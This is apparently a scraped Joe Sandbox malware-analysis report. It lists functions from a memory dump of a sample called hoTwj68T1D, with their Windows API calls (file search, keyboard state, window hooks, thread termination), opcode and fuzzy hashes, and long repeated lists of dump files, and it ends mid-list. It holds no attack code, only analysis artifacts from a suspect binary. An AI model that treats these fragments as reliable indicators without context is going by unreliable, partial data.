Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: e9973fe607696c681040d242e747d95d9a827df1f57a190ab8d9872877a76290
Instruction ID: 9ef90f4223b16d6a246208a91767f2ad79bfe32dac58d3cdc5964c00ab700261
Opcode Fuzzy Hash: e9973fe607696c681040d242e747d95d9a827df1f57a190ab8d9872877a76290
Instruction Fuzzy Hash: 8DF04FB2501604AF9714EF69A881D6B77DCEE88364310416FFE08E7346DA39DD0187A8

Function 00406440 Relevance: 6.0, APIs: 4, Instructions: 39timefileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(?,?), ref: 00406450
GetLastError.KERNEL32(?,?), ref: 00406459
FileTimeToLocalFileTime.KERNEL32(?), ref: 0040646D
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0040647C

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: FileTime$DateErrorFindLastLocalNext
String ID:
API String ID: 2103556486-0
Opcode ID: aa864952282cf8bfd8a252285ccc0ae2e88c357b37bfb14daa5dfbc923adf4bf
Instruction ID: 20f34ffba48860bb21d430cd020f20c6dcea4ec4173e887c212a19bce53a7b57
Opcode Fuzzy Hash: aa864952282cf8bfd8a252285ccc0ae2e88c357b37bfb14daa5dfbc923adf4bf
Instruction Fuzzy Hash: 38F031B25042059FCF44EFA4C9C288737ACAB9831431145B7FE05DF28BE638E9558B79

Function 0042FE14 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?), ref: 0042FE1C
GetSystemMetrics.USER32(00000001), ref: 0042FE29
GetSystemMetrics.USER32(00000000), ref: 0042FE41
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000015,?), ref: 0042FE59

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: MetricsSystemWindow$Rect
String ID:
API String ID: 3945642117-0
Opcode ID: db8121d7a931cb7d8438a357e534022881644fac6d6a2223e97bbf926f8894f1
Instruction ID: 34d1ead05cfd62fbb0ef1419f00db5dcc4561f608982454454249bbf360c5695
Opcode Fuzzy Hash: db8121d7a931cb7d8438a357e534022881644fac6d6a2223e97bbf926f8894f1
Instruction Fuzzy Hash: 73E092B2280701BBF710EA79CC83F3B3289DB4075CF540929BA50AE2D7D9A8B514096E

Function 00426AF4 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON

Download Yara Rule

APIs

GetLastActivePopup.USER32(00000000), ref: 00426B00
IsWindowVisible.USER32(00000000), ref: 00426B11
IsWindowEnabled.USER32(00000000), ref: 00426B1B
SetForegroundWindow.USER32(00000000), ref: 00426B25

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Window$ActiveEnabledForegroundLastPopupVisible
String ID:
API String ID: 2280970139-0
Opcode ID: e82a2646671930f5e117c2d80fa2dbde0664df800579875cbcaed8bbdc12e25d
Instruction ID: 14c0a5dd591245bf75d5e3841c0bf56ddfe9a8e1b2b3eeb62938e1c6a8a582c3
Opcode Fuzzy Hash: e82a2646671930f5e117c2d80fa2dbde0664df800579875cbcaed8bbdc12e25d
Instruction Fuzzy Hash: 6CE08671701931B6AA2526651C81E9F1DCCED0A3593460167FC00F724EEE1CED00C5BC

Function 0040582C Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

GlobalHandle.KERNEL32 ref: 0040582F
GlobalUnlock.KERNEL32(00000000), ref: 00405836
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040583B
GlobalLock.KERNEL32(00000000), ref: 00405841

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Global$AllocHandleLockUnlock
String ID:
API String ID: 2167344118-0
Opcode ID: cfd04805a4dcf0cc6a00a9cbec90324ffcf4260d88d4c73ad13217b0e91212ce
Instruction ID: cf789db58601874a5ce7f543ae3761902350ac12ef120e7fbfed3b747e6b8509
Opcode Fuzzy Hash: cfd04805a4dcf0cc6a00a9cbec90324ffcf4260d88d4c73ad13217b0e91212ce
Instruction Fuzzy Hash: 73B009E4820E0178EC2837B25C0BC3F555CE884B0CB806AAE3600BA0A3D87C980058FE

Function 00440684 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 229COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000FC), ref: 00440798
SetWindowLongA.USER32(?,000000FC,?), ref: 004407B3

Strings

, xrefs: 0044098D

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-3916222277
Opcode ID: 13d0a83f594154b81baf56b68febb9a2160d09098a16e652aafe42e7d71dd308
Instruction ID: 7ec01ccc80cf6c68f34adca28ff80e7ad88f193ee306b5d22eac7e338ca7def7
Opcode Fuzzy Hash: 13d0a83f594154b81baf56b68febb9a2160d09098a16e652aafe42e7d71dd308
Instruction Fuzzy Hash: 3391C070604604DFEB00EFA9C580A9EB3E1AF85314F148657E9459B352D37CEE61DF8A

Function 00489838 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

CharToOemA.USER32(00000000,00000000), ref: 004899CF

Strings

}yH, xrefs: 0048993B
}yH, xrefs: 00489951

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Char
String ID: }yH$}yH
API String ID: 751630497-2717837667
Opcode ID: 2bf9180ad96b4481164fbb4495c5646a180870ed57a3ae746a7a882c98a59714
Instruction ID: 72101751dd7957e94c1f5b34705dba2d4a48d63d3bf4709999e8de602aa12893
Opcode Fuzzy Hash: 2bf9180ad96b4481164fbb4495c5646a180870ed57a3ae746a7a882c98a59714
Instruction Fuzzy Hash: 08513D74E0061ADFCB04EFA9C4819AEF7B5FF48304B15856AE814A7355DB38AE01CBA5

Function 00410DE4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

GetProfileStringA.KERNEL32(windows,device,00410ED4,?,0000004F), ref: 00410E18

Part of subcall function 00410BD4: 74AD5180.WINSPOOL.DRV(00000002,00000000,00000005,00000000,00000000,00410EC4,00000000,00000000,00410D96,?,00000000,00410DD4), ref: 00410C51
Part of subcall function 00410BD4: 74AD5180.WINSPOOL.DRV(00000002,00000000,00000005,?,00410EC4,00410EC4,00000000,00000000,00410D85,?,00000002,00000000,00000005,00000000,00000000,00410EC4), ref: 00410C87

Part of subcall function 00410910: GlobalUnlock.KERNEL32(?), ref: 00410952
Part of subcall function 00410910: GlobalFree.KERNEL32(?), ref: 0041095B
Part of subcall function 00410910: GlobalLock.KERNEL32(?), ref: 0041096A
Part of subcall function 00410910: 74AC5F50.WINSPOOL.DRV(?,00000000,00410B0B,?,00000000,00000000,00000000,?,00410E9E,00000000,00000000), ref: 0041098D

Strings

device, xrefs: 00410E0E
windows, xrefs: 00410E13

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Global$D5180.$F50.FreeLockProfileStringUnlock
String ID: device$windows
API String ID: 3128612351-2557202880
Opcode ID: 8729144c7a47fa1bc2208e6e0575577f389635cfaaf72b4c0cf7a57f1bcd99cf
Instruction ID: 330dd1a6a19deecf703ec9165652ef2e36dddcf87eb08a877432e963c481c446
Opcode Fuzzy Hash: 8729144c7a47fa1bc2208e6e0575577f389635cfaaf72b4c0cf7a57f1bcd99cf
Instruction Fuzzy Hash: EC212171A00208AFD700DFA6C88599EBBE9FF48715B60447BF404EB291DBB8DD818755

Function 00402564 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(\$,00000000,00402616), ref: 004025A7
RtlLeaveCriticalSection.KERNEL32(\$,0040261D), ref: 00402610

Part of subcall function 004019AC: RtlInitializeCriticalSection.KERNEL32(\$,00000000,00401A62), ref: 004019C2
Part of subcall function 004019AC: RtlEnterCriticalSection.KERNEL32(\$,\$,00000000,00401A62), ref: 004019D5
Part of subcall function 004019AC: LocalAlloc.KERNEL32(00000000,00000FF8,\$,00000000,00401A62), ref: 004019FF
Part of subcall function 004019AC: RtlLeaveCriticalSection.KERNEL32(\$,00401A69,00000000,00401A62), ref: 00401A5C

Strings

\$, xrefs: 004025A2, 0040260B

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: \$
API String ID: 2227675388-2346321534
Opcode ID: 1456f2f84d5e6c455647b6f7aa938c3d11c46afdd2a7a565d4d289d8a5abb564
Instruction ID: 5ca553b2b711068bd16594c4fd9085e8445e33d818234d674706ee40b440705e
Opcode Fuzzy Hash: 1456f2f84d5e6c455647b6f7aa938c3d11c46afdd2a7a565d4d289d8a5abb564
Instruction Fuzzy Hash: 011122307042006FEB11AB795F1936A6AD4A78A758F24047FE400F72D2D5FC9C01826C

Function 00441310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000002), ref: 00441331
GetSystemMetrics.USER32(00000014), ref: 00441341

Strings

d, xrefs: 0044136B

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: MetricsSystem
String ID: d
API String ID: 4116985748-2564639436
Opcode ID: 485a9357f7cbf574097655dcf49b431e61b6334619515beec91ea635b80238c1
Instruction ID: d0388d0d0c1317eb9b531d9278beed47665bfdc037217d4f6725139a38d4f0dd
Opcode Fuzzy Hash: 485a9357f7cbf574097655dcf49b431e61b6334619515beec91ea635b80238c1
Instruction Fuzzy Hash: 581188357443409AEB00EF798CC63D53A955F5530DF0891B9EC445F39BE5BE98C48729

Function 004128B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 004128D2
GetKeyState.USER32(00000011), ref: 004128E4

Strings

, xrefs: 004128F4

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: e5f31c39829bcceb1e5f5bc92e000bb828e0abe3edb9cc606d54b50e89ec434a
Instruction ID: e2c28ec9330db9b634e27aa218c1693923790b3caf74519f3e4670d8ca133795
Opcode Fuzzy Hash: e5f31c39829bcceb1e5f5bc92e000bb828e0abe3edb9cc606d54b50e89ec434a
Instruction Fuzzy Hash: 2301D670B0430CDBDB10DBE9D6463DEB3F1AF04314F1481AADC04A6282E7B84E90D758

Function 00425E70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16threadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(000A2D6A), ref: 00425E7F
TerminateThread.KERNEL32(000A2D8A,00000000,0042758A,00000000,00426CA8,?,?,000A2C86,00000001,00426D07), ref: 00425E9C

Strings

j-, xrefs: 00425E70, 00425E79, 00425E86

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
